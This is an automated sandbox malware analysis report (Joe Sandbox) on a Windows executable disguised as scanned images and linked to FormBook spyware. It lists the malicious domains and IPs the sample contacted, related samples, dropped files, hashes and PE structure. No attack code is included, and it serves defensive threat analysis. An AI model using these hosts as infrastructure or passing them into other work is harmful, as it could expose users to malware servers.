                                                          http://www.scottconsults.top/qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.2q33e.top/dim8/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.prediksipreman.fyi/rpjd/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.livingslab.net/otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wddb97.top/p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso=true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.wddb97.top/p75v/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.nexula.website/ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.livingslab.net/otgv/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.7wkto5nk230724z.click/yysf/true
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabverclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/Lverclsid.exe, 00000003.00000002.3550509142.0000000006A28000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.00000000046D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/ac/?q=verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoverclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referverclsid.exe, 00000003.00000002.3550509142.00000000060BC000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.0000000003D6C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchverclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              206.119.82.172
                                                                              		wddb97.topUnited States
                                                                              		174COGENT-174UStrue
                                                                              67.223.117.142
                                                                              		www.nexula.websiteUnited States
                                                                              		15189VIMRO-AS15189UStrue
                                                                              162.0.215.244
                                                                              		prediksipreman.fyiCanada
                                                                              		35893ACPCAtrue
                                                                              13.248.169.48
                                                                              		www.thesquare.worldUnited States
                                                                              		16509AMAZON-02UStrue
                                                                              104.21.3.193
                                                                              		www.7wkto5nk230724z.clickUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              20.244.96.65
                                                                              		quickcommerce.cloudUnited States
                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                              38.47.233.52
                                                                              		2q33e.topUnited States
                                                                              		174COGENT-174UStrue
                                                                              84.32.84.32
                                                                              		xpremio.onlineLithuania
                                                                              		33922NTT-LT-ASLTtrue
                                                                              3.33.130.190
                                                                              		scottconsults.topUnited States
                                                                              		8987AMAZONEXPANSIONGBtrue

                                                                              General Information

                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1590590
                                                                              Start date and time:2025-01-14 10:23:07 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 11s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Run name:Run with higher sleep bypass
                                                                              Number of analysed new started processes analysed:8
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@14/9
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 90%
                                                                              • Number of executed functions: 44
                                                                              • Number of non-executed functions: 302
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 52.165.164.15, 20.109.210.53, 13.107.253.45
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              No simulations

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              206.119.82.172fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                              • www.wddb97.top/cjue/
                                                                              wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                                              • www.d97fw.top/ep96/
                                                                              DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                              • www.wddb97.top/a3g3/
                                                                              DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                              • www.wddb97.top/a3g3/
                                                                              Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.d97fw.top/07qt/
                                                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                              • www.d97fw.top/j0mp/
                                                                              67.223.117.142PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                              • www.flikka.site/brrb/
                                                                              shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                              • www.flikka.site/brrb/
                                                                              New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • www.maviro.xyz/hcih/
                                                                              SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                              • www.flikka.site/brrb/
                                                                              proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                              • www.jorbaq.top/saaz/
                                                                              DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                              • www.plyvik.info/ak8m/
                                                                              SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                              • www.plyvik.info/yhso/
                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                              • www.plyvik.info/ak8m/
                                                                              162.0.215.244IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                              • www.prediksipreman.fyi/3lre/
                                                                              debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                              • www.prediksipreman.fyi/fy4q/
                                                                              NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                              • www.prediksipreman.fyi/3lre/
                                                                              18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                              • www.prediksipreman.fyi/3lre/
                                                                              PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                              • www.prediksipreman.fyi/3lre/
                                                                              http://mirchmasala2go.comGet hashmaliciousUnknownBrowse
                                                                              • mirchmasala2go.com/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              www.thesquare.worldMaryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              www.7wkto5nk230724z.clickIMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.131.32
                                                                              draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.131.32
                                                                              LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.21.3.193

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              VIMRO-AS15189USydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.118.94
                                                                              Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.169
                                                                              specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                              • 67.223.117.169
                                                                              dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.169
                                                                              PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.118.17
                                                                              New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                              • 67.223.117.142
                                                                              ACPCAHandler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                              • 162.0.209.157
                                                                              elitebotnet.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 162.0.4.79
                                                                              elitebotnet.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 162.49.96.105
                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                              • 162.55.163.200
                                                                              http://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                              • 162.55.133.182
                                                                              UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                                              • 162.0.209.157
                                                                              https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                              • 162.0.209.189
                                                                              n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                                              • 162.0.215.33
                                                                              5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                              • 162.0.215.91
                                                                              gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                              • 162.0.213.94
                                                                              AMAZON-02USRemittance.htmlGet hashmaliciousUnknownBrowse
                                                                              • 108.138.26.50
                                                                              Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                                                                              • 52.94.140.208
                                                                              Absa Remittance Advice.docxGet hashmaliciousUnknownBrowse
                                                                              • 52.94.140.208
                                                                              5hsRaLKPV6.jarGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              • 52.216.210.114
                                                                              5hsRaLKPV6.jarGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              • 52.217.130.90
                                                                              https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7QwGet hashmaliciousUnknownBrowse
                                                                              • 18.245.31.88
                                                                              Discord.exeGet hashmaliciousAsyncRATBrowse
                                                                              • 3.127.138.57
                                                                              http://locrmhelp.comGet hashmaliciousUnknownBrowse
                                                                              • 52.84.151.46
                                                                              https://imtcoken.im/Get hashmaliciousUnknownBrowse
                                                                              • 143.204.215.6
                                                                              http://www.toekan.im/Get hashmaliciousUnknownBrowse
                                                                              • 143.204.215.6
                                                                              COGENT-174US8e8JUOzOjR.exeGet hashmaliciousDBatLoaderBrowse
                                                                              • 23.237.26.135
                                                                              https://urlz.fr/tJIZGet hashmaliciousUnknownBrowse
                                                                              • 143.244.197.139
                                                                              3e31414a-0c65-4866-9783-41979ca0d50e.emlGet hashmaliciousUnknownBrowse
                                                                              • 154.26.153.101
                                                                              New Order#12125.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.39.239.237
                                                                              http://id1223.adsalliance.xyzGet hashmaliciousUnknownBrowse
                                                                              • 143.244.38.136
                                                                              elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 149.42.52.10
                                                                              elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 38.189.68.123
                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                              • 38.220.172.156
                                                                              CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                                                              • 154.39.239.237
                                                                              trow.exeGet hashmaliciousUnknownBrowse
                                                                              • 154.53.43.150

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\27-827K5X9

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\verclsid.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\peaks

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287232
                                                                              Entropy (8bit):7.995079098920299
                                                                              Encrypted:true
                                                                              SSDEEP:6144:orQn/2I9aKhtl3bxYfWuLbuWfDqv2c7pUfFKNJ0a2tjuwPAcJGn:o24UtlrIWuvuYY7yMX0a8jHPAb
                                                                              MD5:10ED5D34A0330BDC9F7848B7FBA6B7A7
                                                                              SHA1:1E5599D63A3CA6FC8D1B2981E29E39EBBACEA98B
                                                                              SHA-256:D2DC5D56A99E4D6A08B9C8457679FC58E11AD1CF810CAE48AF4B623319459E47
                                                                              SHA-512:33034D70F7A4A2BD9961B2B246C9920B69ECF5FD8BA68DD164F582FEC193F121E0AC29F116D01F4DDC051B9160F07D51FF1C01930A762419060411ACAF07ABEB
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:xh...XAHB..@......X6..}[I...WDI8DM95PX52NAUXAHBMWDI8DM95PX.2NA[G.FB.^.h.E....0\An1'7&:# w'(V*"M.2=.@;/u1/h...d$W (.8]R.2NAUXAH;L^.tX#..U7..R).O..x-0.S...U7./..i8&..$4,tX#.95PX52NA..AH.LVD?.U/95PX52NA.XCIIL\DIh@M95PX52NA.LAHB]WDIX@M95.X5"NAUZAHDMWDI8DM?5PX52NAU8EHBOWDI8DM;5..52^AUHAHBMGDI(DM95PX%2NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDgL!5M5PX.}JAUHAHB.SDI(DM95PX52NAUXAHbMW$I8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX52NAUXAHBMWDI8DM95PX

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.4188758028769195
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              File size:1'613'824 bytes
                                                                              MD5:17cbb82b7db7a77df6507dd32af10563
                                                                              SHA1:816fc79a0d8dc1ea493779e01f21f99c00a9229d
                                                                              SHA256:744a3efa374159a40ea07cf1c6a295f40fef90685421d20ceda619847dbe6165
                                                                              SHA512:0917ff1f5eca9d620e3829ccbaed79f892c85195917fc420077e5d7004fd8d5cdd71cbc2abd6a27d672f6fe98947faf6aec5a797dd5de64cb1fbe09481621747
                                                                              SSDEEP:24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8aKXAwXiEoFKrQO8wkoPuGwQVZqc/ByR61UFl:2TvC/MTQYxsWR7aKfXZr0pQuAW+sr
                                                                              TLSH:1075E0027381C062FF9B92734B5AF6115BBC69660123A62F13A81DBDFD701B1563E7A3
                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                              File Icon

                                                                              Icon Hash:aaf3e3e3938382a0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x420577
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6785B72C [Tue Jan 14 01:00:28 2025 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:948cc502fe9226992dce9417f952fce3

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007F05A8839483h
                                                                              jmp 00007F05A8838D8Fh
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007F05A8838F6Dh
                                                                              mov dword ptr [esi], 0049FDF0h
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FDF8h
                                                                              mov dword ptr [ecx], 0049FDF0h
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007F05A8838F3Ah
                                                                              mov dword ptr [esi], 0049FE0Ch
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FE14h
                                                                              mov dword ptr [ecx], 0049FE0Ch
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              and dword ptr [eax], 00000000h
                                                                              and dword ptr [eax+04h], 00000000h
                                                                              push eax
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              add eax, 04h
                                                                              push eax
                                                                              call 00007F05A883BB2Dh
                                                                              pop ecx
                                                                              pop ecx
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              lea eax, dword ptr [ecx+04h]
                                                                              mov dword ptr [ecx], 0049FDD0h
                                                                              push eax
                                                                              call 00007F05A883BB78h
                                                                              pop ecx
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              push eax
                                                                              call 00007F05A883BB61h
                                                                              test byte ptr [ebp+08h], 00000001h
                                                                              pop ecx

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb35ec.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1880000x7594.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xd40000xb35ec0xb3600591bed869cb6d434460ffbe7270704ebFalse0.963825675087108data7.962847579133983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1880000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
